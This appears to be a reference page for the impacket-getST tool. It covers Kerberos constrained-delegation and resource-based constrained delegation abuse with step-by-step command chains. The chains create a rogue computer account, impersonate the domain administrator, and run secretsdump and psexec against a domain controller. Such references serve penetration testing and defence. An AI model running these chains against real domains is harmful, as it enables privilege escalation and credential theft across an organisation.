Skip to main content

Overview

impacket-getST requests a Service Ticket (TGS) from the KDC. It supports S4U2Self and S4U2Proxy extensions, making it the primary tool for abusing constrained delegation and resource-based constrained delegation (RBCD). 
impacket-getST <DOMAIN>/<USER> -spn <SERVICE/HOST> [options]

Basic Usage

With Password

impacket-getST domain.local/jdoe:'Password123' -spn cifs/dc01.domain.local -dc-ip 10.10.10.1

With NTLM Hash

impacket-getST domain.local/jdoe -hashes :a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4 -spn cifs/dc01.domain.local -dc-ip 10.10.10.1

With Kerberos (existing TGT)

export KRB5CCNAME=$(pwd)/jdoe.ccache
impacket-getST domain.local/jdoe -k -no-pass -spn cifs/dc01.domain.local -dc-ip 10.10.10.1

S4U2Self

Request a service ticket on behalf of another user to the requesting account’s own SPN. This produces a forwardable ticket if the account is trusted for delegation. 
impacket-getST domain.local/svc_sql:'SvcPass123' \
  -impersonate administrator \
  -spn cifs/dc01.domain.local \
  -dc-ip 10.10.10.1
This performs S4U2Self (get ticket as administrator to svc_sql) then S4U2Proxy (exchange it for a ticket to cifs/dc01.domain.local).

S4U2Proxy (Constrained Delegation)

When an account has msDS-AllowedToDelegateTo set, you can request a service ticket to the allowed SPN while impersonating any user. 
# svc_sql is allowed to delegate to cifs/dc01.domain.local
impacket-getST domain.local/svc_sql:'SvcPass123' \
  -impersonate administrator \
  -spn cifs/dc01.domain.local \
  -dc-ip 10.10.10.1

With NTLM Hash

impacket-getST domain.local/svc_sql \
  -hashes :a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4 \
  -impersonate administrator \
  -spn cifs/dc01.domain.local \
  -dc-ip 10.10.10.1

With AES Key

impacket-getST domain.local/svc_sql \
  -aesKey 3c4a5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c \
  -impersonate administrator \
  -spn cifs/dc01.domain.local \
  -dc-ip 10.10.10.1

Full Constrained Delegation Attack Chain

# 1. Identify accounts with constrained delegation
impacket-findDelegation domain.local/jdoe:'Password123' -dc-ip 10.10.10.1

# 2. Request service ticket impersonating admin
impacket-getST domain.local/svc_sql:'SvcPass123' \
  -impersonate administrator \
  -spn cifs/dc01.domain.local \
  -dc-ip 10.10.10.1

# 3. Use the ticket
export KRB5CCNAME=$(pwd)/administrator@cifs_dc01.domain.local@DOMAIN.LOCAL.ccache
impacket-secretsdump domain.local/[email protected] -k -no-pass

Resource-Based Constrained Delegation (RBCD)

RBCD abuses msDS-AllowedToActOnBehalfOfOtherIdentity on the target computer account.

Prerequisites

  • Control over a computer account (or ability to create one via addcomputer.py)
  • Write access to the target’s msDS-AllowedToActOnBehalfOfOtherIdentity

Full Attack Chain

# 1. Create a computer account (if needed)
impacket-addcomputer domain.local/jdoe:'Password123' \
  -computer-name 'EVILPC$' \
  -computer-pass 'Passw0rd!' \
  -dc-ip 10.10.10.1

# 2. Set RBCD — add EVILPC$ to target's msDS-AllowedToActOnBehalfOfOtherIdentity
# (using rbcd.py, ntlmrelayx, or ldap_shell)
python3 rbcd.py domain.local/jdoe:'Password123' -delegate-from 'EVILPC$' -delegate-to 'TARGET$' -dc-ip 10.10.10.1 -action write

# 3. Request service ticket via S4U2Self + S4U2Proxy
impacket-getST domain.local/'EVILPC$':'Passw0rd!' \
  -impersonate administrator \
  -spn cifs/target.domain.local \
  -dc-ip 10.10.10.1

# 4. Use the ticket
export KRB5CCNAME=$(pwd)/administrator@cifs_target.domain.local@DOMAIN.LOCAL.ccache
impacket-secretsdump domain.local/[email protected] -k -no-pass

The -impersonate Flag

Specifies the user to impersonate via S4U2Self/S4U2Proxy. The impersonated user must not be in the Protected Users group or marked as Account is sensitive and cannot be delegated. 
# Impersonate domain admin
impacket-getST domain.local/svc_sql:'SvcPass123' \
  -impersonate administrator \
  -spn cifs/dc01.domain.local \
  -dc-ip 10.10.10.1

# Impersonate specific user
impacket-getST domain.local/svc_sql:'SvcPass123' \
  -impersonate da_user \
  -spn cifs/dc01.domain.local \
  -dc-ip 10.10.10.1

The -spn Flag

Specifies the target Service Principal Name. Common SPNs:
SPNUse Case
cifs/hostSMB access (psexec, smbclient, secretsdump)
http/hostWeb services, WinRM
mssql/hostSQL Server access
ldap/hostLDAP operations
host/hostGeneric host service
# SMB access
impacket-getST domain.local/svc$:'Pass' -impersonate admin -spn cifs/dc01.domain.local

# MSSQL access
impacket-getST domain.local/svc$:'Pass' -impersonate admin -spn mssql/sql01.domain.local

Using the Resulting Ticket

The output .ccache file is named based on the impersonated user and target SPN: 
# Set the ticket
export KRB5CCNAME=$(pwd)/administrator@cifs_dc01.domain.local@DOMAIN.LOCAL.ccache

# Verify
klist

# Use with impacket tools
impacket-psexec domain.local/[email protected] -k -no-pass
impacket-secretsdump domain.local/[email protected] -k -no-pass
impacket-smbclient domain.local/[email protected] -k -no-pass

Quick Reference

# Basic service ticket
impacket-getST domain.local/jdoe:'Pass' -spn cifs/target.domain.local -dc-ip 10.10.10.1

# Constrained delegation abuse
impacket-getST domain.local/svc:'Pass' -impersonate administrator -spn cifs/dc01.domain.local -dc-ip 10.10.10.1

# RBCD with computer account
impacket-getST domain.local/'EVIL$':'Pass' -impersonate administrator -spn cifs/target.domain.local -dc-ip 10.10.10.1

# With hash
impacket-getST domain.local/svc -hashes :NTHASH -impersonate administrator -spn cifs/dc01.domain.local -dc-ip 10.10.10.1

# With AES key
impacket-getST domain.local/svc -aesKey KEY -impersonate administrator -spn cifs/dc01.domain.local -dc-ip 10.10.10.1
FlagDescription
-spn SPNTarget Service Principal Name
-impersonate USERUser to impersonate via S4U
-hashes LMHASH:NTHASHAuthenticate with NTLM hash
-aesKey KEYAuthenticate with AES key
-dc-ip IPDomain controller IP address
-kUse Kerberos authentication
-no-passDon’t ask for password
-additional-ticket TICKETAdditional ticket for S4U2Proxy
-force-forwardableForce the ticket to be forwardable